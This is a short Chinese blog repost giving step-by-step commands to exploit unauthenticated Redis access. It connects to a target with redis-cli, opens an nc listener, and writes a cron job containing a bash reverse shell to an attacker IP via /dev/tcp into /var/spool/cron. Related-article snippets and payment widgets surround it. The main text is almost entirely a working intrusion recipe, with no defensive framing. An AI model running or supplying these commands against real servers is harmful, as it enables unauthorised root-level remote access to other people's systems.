Redis未授权访问反弹shell

最新推荐文章于 2024-07-29 15:45:39 发布
最新推荐文章于 2024-07-29 15:45:39 发布
阅读量90 收藏
点赞数
文章标签: shell 数据库 网络
原文链接:http://www.cnblogs.com/someone9/p/8986502.html
版权

Redis未授权访问反弹shell

目标主机:10.104.11.178

攻击机:kali

攻击步骤:

1.与目标主机连接

root@kali:~# /usr/redis/redis-cli -h 10.104.11.178

 2.kali主机进行监听

nc -l -v  -p 9999

 

3.写入反弹shell语句

set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/10.104.11.153/9999 0>&1\n\n"
config set dir /var/spool/cron
config set dbfilename root
save

 4.反弹shell连接成功

 

转载于:https://www.cnblogs.com/someone9/p/8986502.html

weixin_30514745
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
关于Redis授权访问漏洞用的介绍与修复建议
01-21
Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。攻击者在...
redis授权访问
热门推荐
guxiaoguo的博客
12-27 1万+
本篇主要从redis授权访问入手,还原一些黑客的攻击场景,介绍一些常用的攻击方法和安全知识。 应用介绍 漏洞介绍 测试环境 说明攻击方法 redis日志 修复方案 作者:悦潺@安全之光 一. 应用介绍   Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、 Key-Value数
Redis授权访问反弹shell
Zlirving_的博客
06-17 2038
Redis简介 Redis 是一个高性能的key-value数据库。为了保证效率,数据都是缓存在内存中。redis会周期性的把更新的数据写入磁盘或者把修改操作写入追加的记录文件,并且在此基础上实现了master-slave(主从)同步   漏洞简介 1、什么是redis授权访问漏洞 Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证,会导致任意
redis授权反弹shell
weixin_34235371的博客
05-15 191
rt发现一处redis授权,进行反弹shell。输入反弹命令:主机监听端口:反弹成功。 转载于:https://blog.51cto.com/13539934/2395206
redis授权访问反弹shell
18年3月萌新白帽子
06-26 4556
一、redis的安装1.使用wget命令获取redis的安装包wget http://download.redis.io/releases/redis-4.0.8.tar.gz2.tar –zxvf redis-4.0.8.tar.gz解压改文件然后进入redis-4.0.8这个文件夹   cd redis-4.0.8然后执行make命令由于我们刚刚安装好redis数据库,还创建用户,默认使用的...
Redis授权访问配合SSH key文件用详解
09-09
本文将详细讨论一个常见的安全问题:Redis授权访问配合SSH key文件用。 Redis默认监听在`0.0.0.0:6379`,这意味着它对所有网络接口开放,如果不加以限制,任何能够访问到服务器的人都可以尝试连接Redis。特别是...
redis授权访问检测脚本.py
02-11
python编写的redis授权访问漏洞检测脚本
Hive命令创建数据库和表(内置数据库
weixin_45422672的博客
07-29 357
在linxu系统下,首先执行cd /simple/hive-0.12.0/bin命令进入bin目录下,然后执行命令:./hive进入到shell命令环境,进入shell环境之前,确保执行命令start-all.sh启动hadoop进程服务。配置完毕hive环境之后,通过hive指令进行创建数据库和表,这些信息被存放在metadata和hdfs上面,当执行操作之后,会在hdfs上有目录结构变化,例如会生成目录“/user/hive/warehouse”一 、进入hive shell环境。
【busybox记录】【shell指令】echo
44083579的博客
07-27 263
echo指令用法
DC-6靶机通关
qq_63831588的博客
07-29 984
做完感觉这个靶机还是很有意思的,并且它其实不难,但是这个思路真的很有意思。首先他的关键点在于让我们通过wp插件的漏洞去拿到webshell其次就是普通用户间的博弈,以往我们都是通过账号密码看来进行切换,而这次是通过sudo普通用户来切换然后最后的提权还是用的sudo,确实也听巧妙的,这次我愿称之为将 sudo 进行到底!!!~~~~~持续更新中。
15 shell脚本
2301_79379541的博客
07-29 166
354 chmod +x nginx.sh //增加执行权限 355 ./nginx.sh //运行脚本 356 systemctl status nginx //查看nginx状态 358 nginx //启动nginx。echo "内容已从 '$old_content' 修改为 '$new_content'"echo "请输入要添加的内容(输入 'exit' 结束):"echo "请输入要删除的内容(输入 'exit' 结束):"echo "请输入要修改为的新内容:"echo "请输入要查找的内容:"
shell脚本与sed基本语法
m0_74614835的博客
07-28 278
shell
linux系统巡检及shell脚本
qq_63926306的博客
07-27 1103
egrep是grep的扩展,支持更多的re元字符, fgrep就是fixed grep或fast grep,它们把所有的字母都看作单词,也就是说,正则表达式中的元字符表示回其自身的字面意义,不再特殊。grep可用于shell脚本,因为grep通过返回一个状态值来说明搜索的状态,如果模板搜索成功,则返回0,如果搜索不成功,则返回1,如果搜索的文件不存在,则返回2。awk 是一种很棒的语言,它适合文本处理和报表生成,其语法较为常见,借鉴了某些语言的一些精华,如 C 语言等。s :取代,可以直接进行取代的工作!
shell脚本复制文件
qiao2458的博客
07-29 39
shell复制文件
Rust:在Ubuntu22.04上安装
风静如云的博客
07-27 415
尝试后由于网络原因,无法顺安装。然后编辑rust.sh文件。设置rust.sh为可执行。2.使用国内源进行安装。直接回车选择默认即可。
为什么Linux系统重启后激活anaconda需要执行 “source anaconda3/bin/activate” 命令?
最新发布
qq_43799400的博客
07-29 71
Linux系统重启后激活anaconda需要执行 “source anaconda3/bin/activate” 命令
shellshell循环的几种方式
卷王工作室
07-28 141
shell循环的几种方式
解决Centos不支持docker命令行tab提示问题!!!
lilinhai548的专栏
07-28 86
在使用CentOS操作系统时,有些用户可能会遇到不能自动补全Docker命令的问题。这是因为CentOS默认不支持Docker Tab提示功能,需要手动配置才能实现。在这篇科普文章中,我们将介绍如何解决这个问题,并提供相应的代码示例。
redis授权访问getshell
03-16
Redis授权访问是指Redis服务器的访问控制没有设置好,导致攻击者可以通过Redis的一些命令获取服务器的敏感信息或者执行恶意代码,从而实现getshell的攻击。为了避免这种情况发生,我们需要对Redis服务器进行安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值